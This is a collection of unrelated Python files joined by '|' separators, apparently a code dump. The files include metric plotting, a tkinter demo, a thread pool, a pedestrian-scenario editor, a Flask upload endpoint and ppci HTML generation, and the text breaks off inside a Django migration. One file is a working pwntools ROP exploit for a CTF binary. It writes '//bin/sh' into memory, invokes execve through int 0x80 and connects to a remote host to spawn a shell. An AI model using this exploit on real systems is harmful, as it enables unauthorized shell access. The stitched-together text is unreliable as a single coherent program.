        # z-score each metric: (score - mean) / std, with mean in column 1 and std in column 2.
        self.stand_SPARCS = (metric_scores["SPARCS"] - estimates.loc[sem_ind, 1]) / estimates.loc[sem_ind, 2]
        self.stand_SPURTS = (metric_scores["SPURTS"] - estimates.loc[qual_ind, 1]) / estimates.loc[qual_ind, 2]
        self.stand_MIMA = (metric_scores["MIMA"] - estimates.loc[gram_ind, 1]) / estimates.loc[gram_ind, 2]

    def compute_grammar_penalities(self, outlier_thres=-1.96):
        """Per-system sum of how far standardized MIMA scores fall below *outlier_thres*.

        :return: list of (non-positive) penalty sums, one per system
        """
        penalties = []
        for i in range(0, self.n_systems):
            gram_penalty = self.stand_MIMA[i::self.n_systems] - outlier_thres
            # Only scores below the threshold contribute.
            gram_penalty[gram_penalty > 0] = 0
            penalties.append(np.sum(gram_penalty))
        return penalties

    def print_ellipse_intersections(self):
        """Print and return the ellipse overlap of each candidate system with the
        reference system. Requires generate_plot() to have built self.ellipse.

        :return: list of intersection fractions, one per candidate system
        """
        indices = list(np.arange(self.n_systems))
        cand_systems = indices[:self.ref_system] + indices[self.ref_system + 1:]
        intersections = []
        for i in cand_systems:
            inter = get_inter(self.ellipse[self.ref_system], self.ellipse[i])
            # Bug fix: the intersection values were printed but never appended,
            # so this method always returned an empty list.
            intersections.append(inter)
            print('Intersection ' + str(i) + ' = ' + str(inter))
        return intersections

    def generate_plot(self, colors, out_file='results/system_plot.png', num_random_pts=100, seed=10, n_std=1.15):
        """Scatter-plot a random subset of each system's standardized scores with
        covariance ellipses and estimated centers, and save the figure.

        :param colors: one matplotlib color per system
        :param out_file: path of the saved figure
        :param num_random_pts: number of points plotted per system
        :param seed: RNG seed for the point selection
        :param n_std: std-deviation multiple for the ellipse size
        """
        assert len(colors) == self.n_systems
        random.seed(seed)
        fig = plt.figure(0)
        ax = fig.add_subplot(111, aspect='equal')
        self.ellipse = []
        center_x = []
        center_y = []
        estimate_set = []
        # Estimate each system's center point (an actual sample, via KMeans).
        for i in range(0, self.n_systems):
            x_all = self.stand_SPARCS[i::self.n_systems]
            y_all = self.stand_SPURTS[i::self.n_systems]
            estimate_x, estimate_y, estimate_index = estimate_center(x_all, y_all)
            center_x.append(estimate_x)
            center_y.append(estimate_y)
            estimate_set.append(estimate_index)
        # Pick distinct random sample indices, avoiding the center estimates.
        rand_set = []
        for _ in range(0, num_random_pts):
            num_pts = int(len(self.stand_SPARCS) / self.n_systems)
            rand_set.append(random.choice([j for j in range(0, num_pts) if j not in estimate_set + rand_set]))
        # Plot the sampled points and the covariance ellipse per system.
        for i in range(0, self.n_systems):
            x_all = self.stand_SPARCS[i::self.n_systems]
            y_all = self.stand_SPURTS[i::self.n_systems]
            x = [x_all[j] for j in rand_set]
            y = [y_all[j] for j in rand_set]
            self.ellipse.append(create_elipse(x_all, y_all, ax, colors[i], n_std)[0])
            ax.scatter(x, y, 5, c=colors[i])
        # Mark the estimated centers on top.
        for i in range(0, self.n_systems):
            ax.scatter(center_x[i], center_y[i], s=60, c=colors[i], marker='^', edgecolors='black')
        self.print_ellipse_intersections()
        ax.set_xlim(-2, 2)
        ax.set_ylim(-2, 2)
        plt.xlabel('SPARCS (Semantic Score)')
        plt.ylabel('SPURTS (Style Score)')
        plt.savefig(out_file)
        plt.show()
import tkinter as tk
def print_txtval():
    """Print the current contents of the entry widget to stdout."""
    print(en.get())
# Build a minimal window: a label, a text entry, and a button that prints
# the entry's current text when clicked.
root = tk.Tk()
root.title('get text box')
root.geometry('350x150')
lb= tk.Label(text='Label')
en=tk.Entry()
bt= tk.Button(text='button',command=print_txtval)
lb.pack()
en.pack()
bt.pack()
# Blocks until the window is closed.
root.mainloop()
def f(x):
    """Placeholder that accepts *x* and does nothing.

    Parameters:
        x: foo (currently unused)
    """
    return None
from queue import Empty, Queue
from threading import Event, Thread
class Task:
    """Task to obtain function for thread pool to run.

    Subclasses override do(); the worker thread calls task_complete() after a
    successful do(), releasing anyone blocked in wait_for_task_done().
    """
    def __init__(self, **kargs):
        # Arbitrary keyword arguments stored for use by subclasses' do().
        self.kargs = kargs
        # Set once the task has been executed by a worker.
        self.event = Event()
    def do(self):
        """Override with the actual work; the default is a no-op."""
        pass
    def task_complete(self):
        """Mark the task as done (called by the worker after do())."""
        self.event.set()
    def wait_for_task_done(self, timout = None):
        """Block until the task completes or *timout* seconds elapse.

        Returns True if the task completed, False on timeout.
        NOTE(review): the parameter name is a typo for "timeout", but renaming
        it would break any caller passing it by keyword.
        """
        return self.event.wait(timout)
class Worker(Thread):
    """Thread executing tasks from a given tasks queue."""

    def __init__(self, tasks):
        """
        :param tasks: queue.Queue the worker consumes Task objects from
        """
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon = True   # don't block interpreter shutdown
        self.doing = True    # cleared by stop() to end the run loop

    def run(self):
        """Consume and execute tasks until stop() is called."""
        while self.doing:
            try:
                # 1s timeout so the loop periodically re-checks self.doing.
                task = self.tasks.get(True, 1)
                try:
                    task.do()
                    task.task_complete()
                except Exception as taskex:
                    # NOTE: task_complete() is not called on failure, so
                    # waiters on the task's event will time out instead.
                    print("__exception: ", str(taskex), taskex.args)
                self.tasks.task_done()
            except Empty:
                # Bug fix: the original bare "except:" swallowed *every*
                # exception here (including KeyboardInterrupt/SystemExit);
                # only the queue-empty timeout is expected.
                pass

    def stop(self):
        """Ask the run loop to exit after the current iteration."""
        self.doing = False
class ThreadPool:
    """Pool of threads consuming tasks from a queue."""

    def __init__(self, num_threads, max_queue_size):
        """
        :param num_threads: number of worker threads to create (not yet started)
        :param max_queue_size: bound for the task queue (add_task blocks when full)
        """
        self.tasks = Queue(max_queue_size)
        self.threads = [Worker(self.tasks) for _ in range(num_threads)]

    def start_pool(self):
        """Start every worker thread."""
        for worker in self.threads:
            worker.start()

    def stop_pool(self):
        """Signal all workers to stop, then wait for each to exit."""
        for worker in self.threads:
            worker.stop()
        for worker in self.threads:
            worker.join()

    def add_task(self, task):
        """Enqueue a task; blocks if the queue is full."""
        self.tasks.put(task)

    def wait_completion(self):
        """Wait for completion of all the tasks in the queue."""
        self.tasks.join()
|
import json
import warnings
def read_scenario(path="scenarios/rimea6.scenario"):
    """
    Load a scenario file with json.

    :param path: the path of the scenario file
    :return: the dictionary containing the scenario's data
    """
    with open(path, 'r') as scenario_file:
        return json.load(scenario_file)
def add_pedestrian(scenario=None, scenario_path=None, out_scen_name=None, output_path=None, id=None,
                   find_min_free_id=True, targetIds=None, radius=0.2, densityDependentSpeed=False,
                   speedDistributionMean=1.34, speedDistributionStandardDeviation=0.26, minimumSpeed=0.5,
                   maximumSpeed=2.2, acceleration=2.0, footstepHistorySize=4, searchRadius=1.0,
                   walkingDirectionCalculation="BY_TARGET_CENTER", walkingDirectionSameIfAngleLessOrEqual=45.0,
                   nextTargetListIndex=0, position=(0, 0), velocity=(0, 0), freeFlowSpeed=1.8522156059160915,
                   followers=None, idAsTarget=-1, infectionStatus="SUSCEPTIBLE", lastInfectionStatusUpdateTime=-1.0,
                   pathogenAbsorbedLoad=0.0, groupIds=None, groupSizes=None, agentsInGroup=None, traj_footsteps=None):
    """
    Add a pedestrian in a scenario and write the resulting scenario to disk.

    :param scenario: the dictionary containing the data of the scenario where a pedestrian needs to be added
    :param scenario_path: the path to a scenario file to be read (alternative to :param scenario:)
    :param output_path: the path where to save the new scenario file
    :param out_scen_name: name of the output scenario
    :param id: id of the new pedestrian; if None, a free one is chosen
    :param find_min_free_id: forwarded to find_free_id() when `id` is None
    All the other parameters are the ones to be written in the pedestrian's json file section.
    :raises AttributeError: if neither scenario nor scenario_path is given, or if
        neither scenario_path nor output_path is given
    """
    # Bug fix: the list-valued parameters used mutable defaults ([]), which are
    # shared between calls in Python; default to None and materialize here.
    targetIds = [] if targetIds is None else targetIds
    followers = [] if followers is None else followers
    groupIds = [] if groupIds is None else groupIds
    groupSizes = [] if groupSizes is None else groupSizes
    agentsInGroup = [] if agentsInGroup is None else agentsInGroup
    traj_footsteps = [] if traj_footsteps is None else traj_footsteps
    # 'scenario' and 'scenario_path' cannot be both None
    if scenario_path is None and scenario is None:
        raise AttributeError("One of 'scenario' and 'scenario_path' must be not None, got both None")
    # if the scenario path is not passed, than an output path is mandatory (otherwise the scenario path is used as output path too)
    elif scenario_path is None and output_path is None:
        raise AttributeError("One of 'scenario_path' and 'output_path' must be not None, got both None")
    # if both the scenario and its path are passed, only the scenario is going to be used and the path is ignored
    elif scenario_path is not None and scenario is not None:
        msg = "Both the scenario and the path to its file were passed to the function 'add_pedestrian'. " \
              "Only the scenario is going to be used, it will not be read again from file"
        warnings.warn(msg, RuntimeWarning)
    # if scenario_path is not None, read the scenario from file
    if scenario_path is not None:
        scenario = read_scenario(scenario_path)
    # if the pedestrian's id is not passed, find a free one
    if id is None:
        # Bug fix: the caller's find_min_free_id flag was previously ignored
        # (find_free_id was always called with find_min_free_id=True).
        id = find_free_id(scenario, find_min_free_id=find_min_free_id)
    # if target id not provided, if there is only 1 target, use its id, otherwise don't set one (pedestrian won't move)
    if not targetIds and len(scenario['scenario']['topography']['targets']) == 1:
        targetIds = [scenario['scenario']['topography']['targets'][0]['id']]
    # create a dictionary with the pedestrian's data (in the format used in the scenario's json file)
    ped = {
        "attributes": {
            "id": id,
            "radius": radius,
            "densityDependentSpeed": densityDependentSpeed,
            "speedDistributionMean": speedDistributionMean,
            "speedDistributionStandardDeviation": speedDistributionStandardDeviation,
            "minimumSpeed": minimumSpeed,
            "maximumSpeed": maximumSpeed,
            "acceleration": acceleration,
            "footstepHistorySize": footstepHistorySize,
            "searchRadius": searchRadius,
            "walkingDirectionCalculation": walkingDirectionCalculation,
            "walkingDirectionSameIfAngleLessOrEqual": walkingDirectionSameIfAngleLessOrEqual
        },
        "source": None,
        "targetIds": targetIds,
        "nextTargetListIndex": nextTargetListIndex,
        "isCurrentTargetAnAgent": False,
        "position": {
            "x": float(position[0]),
            "y": float(position[1])
        },
        "velocity": {
            "x": velocity[0],
            "y": velocity[1]
        },
        "freeFlowSpeed": freeFlowSpeed,
        "followers": followers,
        "idAsTarget": idAsTarget,
        "isChild": False,
        "isLikelyInjured": False,
        "psychologyStatus": {
            "mostImportantStimulus": None,
            "threatMemory": {
                "allThreats": [],
                "latestThreatUnhandled": False
            },
            "selfCategory": "TARGET_ORIENTED",
            "groupMembership": "OUT_GROUP",
            "knowledgeBase": {
                "knowledge": [],
                "informationState": "NO_INFORMATION"
            },
            "perceivedStimuli": [],
            "nextPerceivedStimuli": []
        },
        "healthStatus": {
            "infectionStatus": infectionStatus,
            "lastInfectionStatusUpdateTime": lastInfectionStatusUpdateTime,
            "pathogenAbsorbedLoad": pathogenAbsorbedLoad,
            "startBreatheOutPosition": None,
            "respiratoryTimeOffset": -1.0,
            "breathingIn": False,
            "pathogenEmissionCapacity": -1.0,
            "pathogenAbsorptionRate": -1.0,
            "minInfectiousDose": -1.0,
            "exposedPeriod": -1.0,
            "infectiousPeriod": -1.0,
            "recoveredPeriod": -1.0
        },
        "groupIds": groupIds,
        "groupSizes": groupSizes,
        "agentsInGroup": agentsInGroup,
        "trajectory": {"footSteps": traj_footsteps},
        "modelPedestrianMap": None,
        "type": "PEDESTRIAN"
    }
    # "scenario['scenario']['topography']['dynamicElements']" gives the list of the pedestrians in the scenario;
    # append to it the new pedestrian just created
    scenario['scenario']['topography']['dynamicElements'].append(ped)
    if output_path is None:  # if output_path is None, use scenario_path
        output_path = scenario_path
    elif not output_path.endswith(".scenario"):  # add ".scenario" suffix to the output path if not present
        output_path += ".scenario"
    if out_scen_name is not None:
        scenario['name'] = out_scen_name
    # write the scenario file with the new pedestrian
    with open(output_path, 'w') as f:
        json.dump(scenario, f, indent=' ')
def find_free_id(scenario: dict, find_min_free_id=True):
    """
    Find a free id for a new pedestrian/target.

    :param scenario: dictionary containing a scenario's data
    :param find_min_free_id: if True, finds the minimum free id >= 1 (less
        efficient), otherwise simply a free id (more efficient)
    :return: a free id (int)

    BUG FIX: the original gap-scan never advanced ``prev_id`` while walking the
    sorted busy ids, so e.g. busy ids {1, 2, 4} yielded 2 (already in use).
    It also never considered free ids below the smallest busy id.
    """
    busy_ids = set()
    # iterate over pedestrians to collect their (already busy) ids
    for elem in scenario['scenario']['topography']['dynamicElements']:
        if elem['type'] == 'PEDESTRIAN':
            busy_ids.add(elem['attributes']['id'])
    # iterate over targets to collect their (already busy) ids
    for target in scenario['scenario']['topography']['targets']:
        busy_ids.add(target['id'])
    if not busy_ids:
        # no pedestrian/target at all: 1 is free by convention
        return 1
    if not find_min_free_id:
        return max(busy_ids) + 1  # simply return the max busy id + 1 (which will be free)
    # otherwise scan upward from 1 until the first unused id is found
    candidate = 1
    while candidate in busy_ids:
        candidate += 1
    return candidate
if __name__ == '__main__':
    # Demo run: load the rimea6 scenario, add one pedestrian at (8, 2)
    # heading for target id 5, and save the result as a new scenario file.
    add_pedestrian(
        scenario_path="../task1/scenarios/rimea6.scenario",
        out_scen_name="task3",
        output_path="scenarios/task3.scenario",
        position=(8, 2),
        targetIds=[5]
    )
|
# Print the first ten Fibonacci numbers (0, 1, 1, 2, ..., 34).
# BUG FIX: ported from Python 2 (`print a`, `xrange`) to Python 3 —
# the original was a SyntaxError under any Python 3 interpreter.
a, b = 0, 1
for _ in range(1, 11):
    print(a)
    a, b = b, a + b
# #mod
# for i in range(1, 11):
#     print(i % 2)
# #range (xrange no longer exists in Python 3; range is lazy now)
# for i in range(1, 10):
#     print(i)
# print("--------------")
# #while
# i = 0
# while i <= 10:
#     print(i)
#     i += 1
|
import logging
import os
import socket
from flask import request, render_template, jsonify
from redis import Redis
from . import main_blue

# Redis connection; "redis" is presumably the compose/k8s service hostname — TODO confirm
redis = Redis(host="redis")
# shared access logger for this blueprint
logger = logging.getLogger("app.access")
# whitelist of file extensions accepted by the /upload endpoint
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', "xlsx", "xls", "log"}
@main_blue.route('/')
def index():
    """Root route: plain-text health-check message."""
    message = "It worked!"
    return message
@main_blue.route('/ping')
def ping():
    """Liveness probe: answer with a fixed JSON payload."""
    payload = {"ping": "pong"}
    return jsonify(payload)
@main_blue.route('/redis')
def hello():
    """Bump the Redis-backed hit counter and report it with this host's name."""
    redis.incr('hits')
    hits = redis.get('hits')
    hostname = socket.gethostname()
    return 'Hello Container World! I have been seen %s times and my hostname is %s.\n' % (
        hits, hostname)
@main_blue.route('/get_version')
def get_version():
    """Report the latest application version number as JSON."""
    return jsonify({"version": 1})
def allowed_file(filename):
    """Return True when *filename* has an extension in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    suffix = filename.rsplit('.', 1)[1].lower()
    return suffix in ALLOWED_EXTENSIONS
@main_blue.route('/upload', methods=['GET', 'POST'])
def transfer():
    """Render the upload form on GET; store an uploaded file on POST.

    Returns the upload template (GET) or a small dict describing success
    (``{"status": 1}``) or the failure reason (``{"msg": ...}``).
    """
    if request.method != 'POST':
        return render_template("transfer.html")
    if 'file' not in request.files:
        return {"msg": "No file part."}
    upload = request.files['file']
    # if user does not select file, browser also
    # submit an empty part without filename
    if upload.filename == '':
        return {"msg": "No selected file."}
    if upload and allowed_file(upload.filename):
        logger.info("upload: %s", upload.filename)  # was a bare print()
        # SECURITY FIX: strip directory components from the client-supplied
        # filename so names like "../../etc/cron.d/x" cannot escape /uploads.
        # (werkzeug.utils.secure_filename would be stricter still.)
        filename = os.path.basename(upload.filename)
        upload.save(os.path.join("/uploads", filename))
        return {"status": 1}
    return {"msg": "file error."}
|
import pgzrun
# Spacewalk # by Sean McManus # www.sean.co.uk / www.nostarch.com
WIDTH = 800   # Pygame Zero window width
HEIGHT = 600  # Pygame Zero window height
player_x = 600  # player start position (not yet drawn in this snippet)
player_y = 350
def draw():
    # `screen` and `images` are globals injected by Pygame Zero at runtime.
    screen.blit(images.backdrop, (0, 0))
pgzrun.go() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from eospac.base import EosUnits
from eospac import EosMaterial
from eospac.feos import FeosMaterial
import eospac.feos.interface
import numpy as np
from eospac.base import eV2K_cst
from numpy.testing import assert_allclose
def is_equal(x,y):
    """Test helper for nose-style ``yield`` checks: assert that x equals y."""
    assert x == y
def test_low_level():
    """ Check consistency of the FEOS low-level interface.

    NOTE(review): most locals below (maxwell_temps, rho, temp, use_maxwell,
    table_handle, use_softsphere) feed only the commented-out `_init_mat` /
    `_get_eos*` checks at the bottom; they are kept so those checks can be
    re-enabled.
    """
    maxwell_temps = np.logspace(-4, 1, 50)
    rho = np.logspace(-4, 1, 10)
    temp = np.logspace(-3, 3, 10)
    use_maxwell = 1
    table_handle = 1
    use_softsphere = 1
    matid = 3719  # FEOS material id under test — presumably CH; verify
    my_opts ={'use_maxwell': True, 'use_softspheres': True,
              'maxwell_temp_arr': None, 'max_materials': 2,
              'grid_subsample_default': 0}
    # build the material with all *_DT tables in cgs units
    mat1 = FeosMaterial(matid, tables=['.*_DT'], options=my_opts, units='cgs')
    D_arr, T_arr = mat1.Pt_DT['D_Array'], mat1.Pt_DT['T_Array']
    D, T = np.meshgrid(D_arr, T_arr, indexing='ij')
    #print mat1.Pt_DT(D, T).min()
    #print mat1.Ut_DT(D, T).min()
    #Nel, N_maxwell_iso, Maxwell_T_reliable = _init_mat(table_handle, matid, use_maxwell, use_softsphere, maxwell_temps)
    #res = _get_eos_all(table_handle, Nel, use_maxwell, rho, temp)
    #res2 = _get_eos(table_handle, 0, Nel, use_maxwell, rho, temp)
    #yield assert_allclose, res['Pt'], res2['P']
    #print _get_mat_par(table_handle, Nel)
    #print _get_crit_point(table_handle)
    #print _get_soft_shere_par(table_handle)
|
# Compute and print the square of x.
x = 9
print(x ** 2)
|
"""
Functions related to inspecting Program objects/classes in a graph.
"""
import json
from .base import Program, SourceCodeProgram, IntermediateProgram
from .base import MachineProgram, get_program_classes
def get_targets(program):
    """ Get the program names that the given Program instance/subclass
    can be compiled to.

    Accepts a Program instance, a Program subclass, or a language name
    (case-insensitive string); returns a set of language-name strings.
    """
    subclasses = get_program_classes()
    if isinstance(program, str):
        # FIX: reuse the registry fetched above instead of calling
        # get_program_classes() a second time.
        program = subclasses[program.lower()]
    cls = program if isinstance(program, type) else type(program)
    if not issubclass(cls, Program):
        raise TypeError('get_targets() needs Program instance or class.')
    # Every to_xxx() method whose suffix names a registered language is a target.
    targets = set()
    for method_name in dir(cls):
        if method_name.startswith('to_') and callable(getattr(cls, method_name)):
            prog_name = method_name[3:]
            if prog_name in subclasses:
                targets.add(prog_name)
    return targets
def get_program_graph():
    """ Produce a networkx graph where the nodes are language names and the
    (directed) edges represent compilers.
    """
    from ppci.utils import graph
    excluded = ('', 'sourcecode', 'intermediate', 'machine')
    program_classes = get_program_classes()
    g = graph.DiGraph()
    # One node per concrete language (base-class registry names are skipped).
    for language in program_classes:
        if language not in excluded:
            g.add_node(language)
    # One edge per available compilation step.
    for language, program_class in program_classes.items():
        for target_language in get_targets(program_class):
            g.add_edge(language, target_language)
    return g
def mcp(program, target_name):
    """ Find the chain of representations to go from the given Program instance
    to the target language.

    This is essentially the Minimum Cost Path algorithm (breadth-first over
    compile targets), and we can improve this to weight costs in various ways.

    :param program: Program instance to start from.
    :param target_name: language name to reach.
    :return: list of chains, each a tuple of language names ending in
        ``target_name``; empty list if no path was found.
        NOTE(review): the original docstring claimed ``None`` on failure,
        but the code always returns the (possibly empty) ``chains`` list.
    """
    subclasses = get_program_classes()
    # Init front list of (cost, program1, program2, ...)
    front = [(1, program.language, tgt) for tgt in get_targets(program)]
    chains = []  # valid chains, sorted by length
    visited = set()
    visited.add(program.language)
    while True:
        # Are any chains finished? (iterate in reverse so pop(i) is safe)
        for i in reversed(range(len(front))):
            chain = front[i]
            if chain[-1] == target_name:
                chains.append(chain[1:])  # skip costs
                front.pop(i)
        # Are we finished?
        if not front:
            break
        # Expand front to target of each node in the front
        new_visited = set()
        for i in reversed(range(len(front))):
            chain = front.pop(i)
            # NOTE(review): rebinding `program` here shadows the argument;
            # intentional-looking but worth confirming.
            program = subclasses[chain[-1]]
            for tgt in get_targets(program):  # For each target
                if tgt not in visited:
                    new_chain = (chain[0] + 1, ) + chain[1:] + (tgt, )
                    front.append(new_chain)
                    new_visited.add(tgt)
        visited.update(new_visited)
        # No new language reached this round -> remaining fronts are dead ends.
        if not new_visited:
            break
    return chains
def get_program_classes_by_group():
    """ Return programs classes in three groups (source code, ir, machine code),
    sorted by language name, and with base classes excluded.
    """
    base_classes = (Program, SourceCodeProgram, IntermediateProgram,
                    MachineProgram)
    source_group, ir_group, machine_group = [], [], []
    registry = get_program_classes()
    for cls in sorted(registry.values(), key=lambda c: c.language):
        if cls in base_classes:
            continue  # skip the abstract bases themselves
        if issubclass(cls, SourceCodeProgram):
            source_group.append(cls)
        elif issubclass(cls, IntermediateProgram):
            ir_group.append(cls)
        elif issubclass(cls, MachineProgram):
            machine_group.append(cls)
    return source_group, ir_group, machine_group
def get_program_classes_html():
    """ Generate html to show program classes in a graph.

    Builds a three-column table (source / intermediate / machine languages)
    plus a JSON adjacency dict that the accompanying JS uses to draw hover
    arrows between a language and its compile targets.
    """
    programs1, programs2, programs3 = get_program_classes_by_group()
    # Create elements (one <td> of anchors per group).
    columns = []
    for column in range(3):
        progs = (programs1, programs2, programs3)[column]
        text = ''
        for program in progs:
            elem_id = 'ppci-program-{}'.format(program.language)
            link = '#{}'.format(program.__name__)
            t = "<a id='{}' href='{}' onmouseover='ppci_show_targets(\"{}\");'"
            t += " onmouseout='ppci_hide_targets();'>{}</a>"
            text += t.format(elem_id, link, program.language, program.language)
            text += '\n'
        columns.append('<td>{}</td>'.format(text))
    table_html = (
        "<table class='ppci-programs'>\n" +
        "<tr><th><a href='#SourceCodeProgram'>Source code</a></th>" +
        "<th><a href='#IntermediateProgram'>Intermediate</a></th>" +
        "<th><a href='#MachineProgram'>Machine code</a></th></tr>\n" +
        # BUG FIX: the row used to be closed twice ("</tr></tr>").
        "<tr>{}</tr>\n".format(''.join(columns)) +
        "</table>")
    # Generate "graph"
    # - the references are sorted by group so that arrows dont cross
    graphdict = {}
    for source_program in programs1 + programs2 + programs3:
        targets = get_targets(source_program)
        graphdict[source_program.language] = sorted_targets = []
        for target_program in programs1 + programs2 + programs3:
            if target_program.language in targets:
                sorted_targets.append(target_program.language)
    # Splice table, css, js and the adjacency dict into the page skeleton.
    html = HTML.replace('TABLE', table_html).replace('STYLE', STYLE)
    html = html.replace('JS', JS).replace('GRAPHDICT', json.dumps(graphdict))
    return html
# Below is some html/css/js that is included in the rst
# Page skeleton for get_program_classes_html(); the TABLE / STYLE / JS /
# GRAPHDICT placeholders are substituted via str.replace.
HTML = """
<script>
var ppci_graphdict = GRAPHDICT;
JS
</script>
<style>
STYLE
</style>
TABLE
"""
# CSS for the program table and the hover arrows (inlined into HTML above).
STYLE = """
table.ppci-programs {
width: 100%;
max-width: 50em;
}
table.ppci-programs th{
text-align: center;
font-weight: bold;
text-decoration: none;
}
table.ppci-programs th > a {
text-decoration: none;
}
table.ppci-programs td > a {
display: block;
border: 1px solid rgba(0, 0, 0, 0.5);
background: #fff;
border-radius: 0.2em;
padding: 0.1em 0.5em;
margin: 0.5em 1em;
font-size: 120%;
text-align: center;
text-decoration: none;
color: #004;
}
table.ppci-programs td > a:hover {
border: 1px solid rgba(0, 0, 255, 0.5);
}
table.ppci-programs td > a > div.ppci-arrow {
position: absolute;
z-index: 20;
border: 1.5px solid rgba(0, 0, 255, 0.4);
margin: 0;
padding: 0;
text-align: right;
vertical-align: center;
height: 0;
font-size: 10px; /* get consistent arrow heads */
transform-origin: top left;
}
table.ppci-programs td > a > div.ppci-arrow > i {
border: 1.5px solid rgba(0, 0, 255, 0.4);
border-width: 0 3px 3px 0;
display: inline-block;
margin: 0;
padding: 4px;
transform: translate(1px, -5.5px) rotate(-45deg);
}
"""
# Client-side behaviour: on hover over a language box, draw one arrow <div>
# per compile target using the ppci_graphdict adjacency dict.
JS = """
function ppci_hide_targets() {
for (var i=0; i<ppci_arrows.length; i++) {ppci_arrows[i].remove(); }
ppci_arrows = [];
}
function ppci_show_targets(name) {
var p1, p2, d1, d2, r1, r2, dist;
d1 = document.getElementById('ppci-program-' + name);
r1 = d1.getBoundingClientRect();
var targets = ppci_graphdict[name];
for (var i=0; i<targets.length; i++) {
d2 = document.getElementById('ppci-program-' + targets[i]);
r2 = d2.getBoundingClientRect();
var xx = get_rect_edge_positions(r1, r2);
p1 = xx[0]; p2 = xx[1]; dist = xx[2];
p1 = [p1[0] + window.scrollX, p1[1] + window.scrollY];
p2 = [p2[0] + window.scrollX, p2[1] + window.scrollY];
var angle = Math.atan2(p2[1] - p1[1], p2[0] - p1[0]);
var arrow = document.createElement('div');
arrow.className = 'ppci-arrow';
arrow.appendChild(document.createElement('i'));
d1.appendChild(arrow);
ppci_arrows.push(arrow);
arrow.style.left = p1[0] + 'px';
arrow.style.top = p1[1] + 'px';
arrow.style.width = dist + 'px';
arrow.style.transform = 'rotate(' + angle + 'rad)';
}
}
function get_rect_edge_positions(r1, r2) {
var i, p1, p2, dist, p, d;
p1 = c1 = [0.5 * (r1.left + r1.right), 0.5 * (r1.top + r1.bottom)];
p2 = c2 = [0.5 * (r2.left + r2.right), 0.5 * (r2.top + r2.bottom)];
dist = Math.pow(p1[0] - p2[0], 2) + Math.pow(p1[1] - p2[1], 2);
// first select closest point on rect 1
var positions1 = [
[c1[0], r1.top], [c1[0], r1.bottom],
[r1.left, c1[1]], [r1.right, c1[1]]];
for (var i=0; i<4; i++) {
p = positions1[i];
d = Math.pow(p[0] - p2[0], 2) + Math.pow(p[1] - p2[1], 2);
if (d < dist) { p1 = p; dist = d; }
}
// then select closest point on rect 2
var positions2 = [
[c2[0], r2.top], [c2[0], r2.bottom],
[r2.left, c2[1]], [r2.right, c2[1]]];
for (var i=0; i<4; i++) {
p = positions2[i];
d = Math.pow(p1[0] - p[0], 2) + Math.pow(p1[1] - p[1], 2);
if (d < dist) { p2 = p; dist = d; }
}
return [p1, p2, Math.sqrt(dist)];
}
var ppci_arrows = [];
"""
|
#!/usr/bin/env python3
# CTF exploit for the "lsass" 32-bit binary: a ROP chain that writes
# "/bin/sh" into scratch memory and invokes execve via `int 0x80`.
from pwn import *
binary = context.binary = ELF('./lsass')
# Target selection: remote service when REMOTE is passed, local binary otherwise.
if args.REMOTE:
    p = remote('35.238.225.156', 1004)
else:
    p = process(binary.path)
# ropper --file lsass --chain "execve cmd=/bin/sh" --badbytes 0a
IMAGE_BASE_0 = 0x08048000 # da2732480d49a078e666802ee2edcd948700eacaaa48129430ea1ff6d5e8e5c6
rebase_0 = lambda x : p32(x + IMAGE_BASE_0)
rop = b''
# Write "//bi" to 0x0809a060 via the mov [ebx], edi gadget.
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += b'//bi'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a060)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
# Write "n/sh" to 0x0809a064 (completes "//bin/sh").
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += b'n/sh'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a064)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
# NUL-terminate the string at 0x0809a068.
rop += rebase_0(0x0000319b) # 0x0804b19b: pop edi; ret;
rop += p32(0x00000000)
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a068)
rop += rebase_0(0x0004627d) # 0x0808e27d: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
rop += p32(0xdeadbeef)
# execve("//bin/sh", argv=0x0809a068, envp=0x0809a068): ebx/ecx/edx, eax=0x0b.
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009a060)
rop += rebase_0(0x0001c081) # 0x08064081: pop ecx; add al, 0xf6; ret;
rop += rebase_0(0x0009a068)
rop += rebase_0(0x0004fa95) # 0x08097a95: pop edx; xor eax, eax; pop edi; ret;
rop += rebase_0(0x0009a068)
rop += p32(0xdeadbeef)
rop += rebase_0(0x00001825) # 0x08049825: pop ebp; ret;
rop += p32(0x0000000b)
rop += rebase_0(0x0001aa7e) # 0x08062a7e: xchg eax, ebp; ret;
rop += rebase_0(0x000319a0) # 0x080799a0: int 0x80; ret;
# 0x11 bytes of padding to reach the saved return address — presumably found
# by cyclic offset; confirm against the binary.
payload = 0x11 * b'A'
payload += rop
# NOTE(review): modern pwntools expects bytes for the marker ('arguments:\n'
# is str here) — it still works via implicit encoding, but b'...' is safer.
p.sendlineafter('arguments:\n',payload)
p.interactive()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-05-23 17:22
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.search
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration (Django 1.11.4).

    Registers the SubawardView and SummaryStateView models; both are
    unmanaged (``managed: False``) and map onto existing database views
    (``subaward_view`` / ``summary_state_view``), so no tables are created.
    """

    dependencies = [
        ('references', '0016_create_gtas_total_obligation_table'),
        ('awards', '0030_merge_20180517_1646'),
    ]

    operations = [
